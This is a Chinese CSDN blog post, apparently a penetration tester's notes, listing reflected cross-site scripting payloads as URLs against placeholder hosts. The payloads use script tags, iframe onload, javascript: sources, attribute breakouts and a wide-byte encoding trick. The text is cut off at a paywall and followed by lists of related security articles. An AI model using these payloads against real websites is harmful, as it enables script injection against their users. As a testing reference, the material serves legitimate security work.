web渗透测试整理1(跨站脚本)

最新推荐文章于 2024-05-01 09:36:48 发布
最新推荐文章于 2024-05-01 09:36:48 发布
阅读量1.2k 收藏 1
点赞数 1
分类专栏: web渗透测试 文章标签: web渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40334963/article/details/98850546
版权

跨站脚本构建模块

1.http://xxx/poll_skimcx.jsp?pollId=425<script>alert(27006)</script>
2.http://xxx/class.asp?BigClassName=新闻中心</title><script>alert(23503)</script>
3.http://xxx/goods.php?id=531*/->�"�'></iframe></script></style></title></textarea><script>alert(/1/)</script>
  �"�'>:%cf%22%d5%27%3E     宽字节跨站脚本
4.http://xxx/network.php/"><script>prompt(21927)</script>
5.http://xxx/poll_skimcx.jsp?pollId=425<iframe onload=prompt(1234)>
6.www.xxx.com/plus/count.php/<script>alert(22804)</script>?view=yes&aid=10483&mid=1

http://xxx/index.php/><script>prompt(38444)</script>

源码效果

www.xxx.com/product/index/CuteEditor/item/p/item.html?type="><iframe src=javascript:alert(65647)>

源码效果

www.xxx.com/cmd.asp?act=gettburl&id=18"><script>alert(44933)</script>

源码效果

https://xxx/other.aspx?Colname="onclick="prompt(8211)"&KeyWord=&PageNo=2&action=live
Onclick事件需要点击执行

源码效果

http://xxx/list_2ba5de55-7dac-4c6a-b044-6727fc3d63ea.html?lmid=2ba5de55-7dac-4c6a-b044-6727fc3d63
最低0.47元/天 解锁文章
沙上有印
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
18、JS渗透(三)
剑指苍天
02-28 972
js项目分析: ​ 1、为了查找参数 ​ 2、为了查找动态加载的隐藏内容 js加密:通过js加密给服务器的是限制机器人,通过js加密给客户端的是防盗保护。前者分析是把参数加密然后用机器人发送达到伪装的目的,后者通过解密客户端发来的js代码,获取资源来达到解密目的。实质是一个加密来伪装自己和一个破解密码的不同原理。 js动态加载:有些内容不是加密,但是需要javascript代码通过用户操作,通过二次的交互加载出来的,这种情况如果是在初始页面的基础上交互的话,网页源码是不会变化的,机器人爬取的时候就不会得
JavaScript基础02
qq_45174221的博客
04-16 232
对象由花括号分隔。在括号内部,对象的属性以名称和值对的形式 (name : value) 来定义。属性由逗号person有三个属性:firstname、lastname 以及 idJavaScript 变量均为对象。当您声明一个变量时,就创建了一个新的对象。
渗透测试--信息收集
2301_76346422的博客
04-13 160
在Javascript中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞JS开发的WEB应用和PHP,JAVA,NET等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。获取URL,获取JS敏感信息,获取代码传参等,所以相当于JS开发的WEB应用属于白盒测试(默认有源码参考),一般会在JS中寻找更多的URL地址,在JS代码逻辑(加密算法,APIkey配置,验证逻辑等)进行后期安全测试。前提:Web应用可以采用后端或前端语言开发。
2024年最新WEB渗透安全之JS函数_js渗透(1)
最新发布
2401_84240129的博客
05-01 527
/20test();//10”)”);var pass = prompt(“请输出你的密码”);var flag = confirm(“今晚小树林儿见,可以吗?”)alert(“我想见你!”)a;typeof(a);//“bcd”
JS架构&框架识别&泄漏提取&API接口枚举&FUZZ爬虫&插件项目
zrx9988的博客
07-03 808
在JS中也存在变量和函数,当存在可控变量及函数调用即可参数漏洞JS开发的WEB应用和PHP,JAVA,.Net等区别在于即没有源代码,也可以通过浏览器的查看源代码获取真实的点。获取URL,获取JS敏感信息,获取代码传参等,所以相当于JS开发的WEB应用属于白盒测试(默认有源码参考),一般会在JS中寻找更多的URL地址,在JS代码逻辑(加密算法,APIKEY配置,验证逻辑等)进行后期安全测试;前提:WEB应用可以采用后端或前端语言开发。
渗透测试过程中的JS调试(一)
小司机的奥拓
11-22 1024
很多方面的知识我也是自己有接触到才去学习,可能对于一些大佬来说,这些都是很基础,勿喷。作为字符去查询的时候,建议不要全部字符去查询,因为有时候他可能会把对应的字符串分开放,或者做拼接。以下的一个案例是我在测试一个后台管理系统时遇到的问题,本来在登录页面通过js已经发现了接口和字段,但是请求的时候发现不是未授权漏洞,但是字段只有新密码和用户名,那么这个大概率是存在漏洞的。对于搜索,可以把js和html页面都代理从burp出去,然后使用burp自带的搜索,可能会比较方便。很不幸,还是这个混淆过的看不懂的js。
WEB应用渗透测试的步骤
12-28
这些方法涵盖了常见的WEB应用安全威胁,如SQL注入、跨站脚本(XSS)、文件包含等。 2. **漏洞验证**:在发现了潜在的安全漏洞后,测试人员还需要进一步验证这些漏洞是否真实存在。这一步骤对于确认测试结果的有效性...
zaproxy(Web渗透测试 Zed Attack Proxy)
06-02
1. **自动扫描**:Zap提供了多种自动化扫描策略,能够快速检测常见的安全问题,如SQL注入、跨站脚本(XSS)、CSRF(跨站请求伪造)等。 2. **代理模式**:Zap作为一个HTTP/HTTPS代理服务器运行,用户可以通过配置...
WEB渗透——新手入门之初级工具利用
01-16
2. **漏洞扫描**:接下来是漏洞扫描,使用工具如Nessus、OpenVAS、Burp Suite的Scanner模块等,可以自动检测出常见的安全漏洞,如SQL注入、XSS跨站脚本、CSRF跨站请求伪造等。 3. **SQL注入**:这是Web应用中最常见...
Penetration-Testing-Framework.rar_渗透测试
09-24
这可能包括SQL注入、跨站脚本(XSS)、缓冲区溢出等攻击手段。"Penetration Testing Framework 0.50.html"会指导如何安全地进行这些操作,避免对生产环境造成实际损害。 最后,测试结果的整理和报告是整个过程的...
一套渗透测试力作!20G视频教程+配套资料倾情奉献!.txt
08-20
根据提供的文件信息,我们可以推断出这是一套与渗透测试相关的资源分享,包含了20GB的视频教程以及相应的配套资料。接下来将详细解读并总结出其中可能涉及的关键知识点。 ### 渗透测试基础 #### 1. 渗透测试定义 ...
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 749
任务环境说明:服务器场景:Server1。
Chrome调试面板详情
qq_45173315的博客
12-10 732
爬虫最基础前言关于Chrome调试面板的一些详情常用面板Network面板设置断点逐步调试作用域调用堆栈 前言 刚刚入门爬虫,记录一些自己的思路,以便日后参考,再者就是有幸能给诸君一点点帮助 所用网站链接链接: 百度翻译. 关于Chrome调试面板的一些详情 常用面板 定位小箭头按钮(左边第一个): 选中Elements面板,并启动该按钮,可以在页面中定位相应元素的源代码位置,或者选择源代码位置可定位到页面相应的元素。 手机-PC视图切换按钮(左边第二个): 启动该按钮,网页可以在pc网址网页和
XSS专栏之常见xss--总结备忘
键盘的起始页
02-25 1028
开始总结一些xss的想法。
web渗透之JavaScript基础
qq_40480474的博客
04-05 4337
  大家好啊!我是小菜鸟,一个想学渗透的小白。有志同道合的小伙伴就快加入我吧!欢迎大家指正错误的地方。记得三连鼓励哦!   JavaScript对于后面的xss跨站脚本很有用。等我慢慢更新吧! JavaScript:一门客户端脚本语言 JavaScript的组成: 1,ECMAScript:基本的语法和对象 2,BOM:浏览器模型,与浏览器进行交互 3,DOM:文档模型,与网页内容进行交互 JavaScript有三种写法: 1.内嵌式: <script>alert('我是小菜
自学黑客,一般人我劝你还是算了吧!
m0_74942241的博客
02-17 171
写在开篇 笔者本人 17 年就读于一所普通的本科学校,20 年 6 月在三年经验的时候顺利通过校招实习面试进入大厂,现就职于某大厂安全联合实验室。 我为啥说自学黑客,一般人我还是劝你算了吧!因为我就是那个不一般的人。
渗透测试过程中的JS调试
Javachichi的博客
04-25 298
渗透测试过程中经常会遇到无验证码或者验证码失效的情况,一但发现这种情况,肯定得进行账户密码的爆破,但抓包后发现,账户密码加密了.....此时的你,是不是已经准备好了放弃?遇到这种情况不要慌,F12翻翻加密方式,往往会有意外惊喜。今天在测试过程中就发现了网站使用的AES加密,并且在js代码中已经直接给出了加密key和加密矢量,通过这些。我们就能自己写个js小脚本,去将自己的弱口令字典转换为加密后的值,然后在进行爆破。
如何在iframe显示文本_学点新姿势:如何发现一个0-day XSS?
weixin_39974400的博客
11-27 390
XSS漏洞可以说是初学者最容易发现的安全漏洞之一了,但是在目前各种WAF、CSP越来越严苛的情况下,XSS也早没有前几年那么容易发掘了。很多朋友私信向我反馈,为什么自己在靶场里可以如鱼得水地完成题目,一到真实站点的挖掘中就束手无措了,就是因为学的思路和测试技巧都已经被WAF过滤完了,说简单点就是仅靠一些入门级别的测试手法基本上很难挖到漏洞了。所以不要再反复问,学了一些网络安全入门应该怎么去挖漏洞?...
Web渗透测试入门:基础与安全风险
为了防御,我们需要对用户输入数据进行过滤和转义,防止SQL注入、跨站脚本攻击(XSS)等常见的Web漏洞。 Web安全风险主要包括信息泄漏、形象损失、信息丢失和经济损失。一旦Web应用被攻击,不仅可能导致敏感数据...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值